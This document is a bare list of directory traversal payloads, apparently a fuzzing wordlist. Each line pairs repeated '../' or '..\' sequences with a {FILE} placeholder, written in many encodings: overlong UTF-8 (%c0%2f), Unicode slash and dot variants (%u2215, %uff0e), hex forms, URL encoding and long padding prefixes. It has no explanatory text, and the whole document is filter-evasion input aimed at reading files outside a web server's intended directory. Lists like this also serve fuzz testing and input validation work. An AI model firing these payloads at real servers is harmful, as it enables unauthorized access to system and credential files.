AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.../{FILE}&lt;br /&gt;
.../.../{FILE}&lt;br /&gt;
.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
...\{FILE}&lt;br /&gt;
...\...\{FILE}&lt;br /&gt;
...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
..../{FILE}&lt;br /&gt;
..../..../{FILE}&lt;br /&gt;
..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
....\{FILE}&lt;br /&gt;
....\....\{FILE}&lt;br /&gt;
....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
........................................................................../{FILE}&lt;br /&gt;
........................................................................../../{FILE}&lt;br /&gt;
........................................................................../../../{FILE}&lt;br /&gt;
........................................................................../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../../{FILE}&lt;br /&gt;
..........................................................................\{FILE}&lt;br /&gt;
..........................................................................\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
